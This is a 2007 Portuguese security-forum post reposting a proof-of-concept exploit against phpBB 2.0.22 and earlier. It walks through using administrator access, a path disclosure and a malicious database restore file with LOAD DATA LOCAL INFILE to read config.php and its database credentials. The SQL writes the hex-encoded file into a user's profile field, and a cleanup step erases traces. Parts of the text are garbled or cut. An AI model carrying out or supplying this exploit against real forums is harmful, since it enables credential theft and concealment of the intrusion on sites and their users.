Segurança & Hacking => Bugs | Exploits | Vulnerabilidades => Topic started by: DarkGenesis on 20 de October , 2007, 09:41:30 AM
Title: phpBB <= 2.0.22 Remote Database Authentication
Post by: DarkGenesis on 20 de October , 2007, 09:41:30 AM
phpBB <= 2.0.22 Remote Database Authentication
Quote## phpBB <= 2.0.22 Remote Database Authentication Details POC ## ## This text will show you how to get the content of the file ## config.php with the 'LOCAL INFILE' SQL command. You can also ## do it with 'LOAD_FILE' but you'll need file privileges, that's ## not interesting. To do it, you'll need Administrator rights ## (we'll use admin_db_utilities.php) and local_infile=ON ## (you don't need file privileges, that's why it's quite cool). ## PHP scripts should not permit the user to execute SQL commands. ## ## 1 Go to http:///login.php?redirect=admin/index.php&admin=1 ## 2 Log in as Administrator ## ## 3 Go to http:///admin/admin_styles.php?mode[]=create&sid= ## 4 You'll get a full path disclosure, note it somewhere ## ## 5 Go to http:///admin/admin_db_utilities.php?perform=backup&sid= ## 6 Choose "Structure-Only backup" then click on "Start Backup" ## 7 Now open the file and search the table prefix, note it ## ## 8 Go to http:///admin/admin_db_utilities.php?perform=restore&sid= ## 9 Create a file which have this content [replace ,,]: ## /*----------------------------------------------------------------------*/ ## CREATE TABLE tmp_hack(content text, email text, viewemail text); ## LOAD DATA LOCAL INFILE 'config.php' INTO TABLE tmp_hack FIELDS ## TERMINATED BY '__eof__' ESCAPED BY '' LINES TERMINATED BY '__eof__'; ## UPDATE tmp_hack SET viewemail=(SELECT user_viewemail FROM users WHERE ## username=''), email=(SELECT user_email FROM users WHERE username=''); ## UPDATE users SET user_viewemail=0, user_email= ## CONCAT('">
Encoded content ## UNHEX(20),'type="text" value="', ## (SELECT HEX(content) FROM tmp_hack),'">## ## 11 Go to http:///profile.php?mode=editprofile, get the encoded content ## 12 This is the encoded content of the file config.php, use the pack() function to decode it ## 13 For example, with php, type this in your shell: php -r print(pack('H*','')); ## 14 Note that I encoded the file content because this can produce an SQL error (e.g. login.php) ## ## 15 If you want to clear traces, execute this SQL file [replace ,]: ## /*----------------------------------------------------------------------*/ ## UPDATE users SET user_viewemail=(SELECT viewemail FROM tmp_hack), ## user_email=(SELECT email FROM tmp_hack) WHERE username=''; ## DROP TABLE tmp_hack; ## /*----------------------------------------------------------------------*/ ## ## by DarkFig ## http://acid-root.new.fr/ (http://acid-root.new.fr/) ## #acidroot@irc.worldnet.net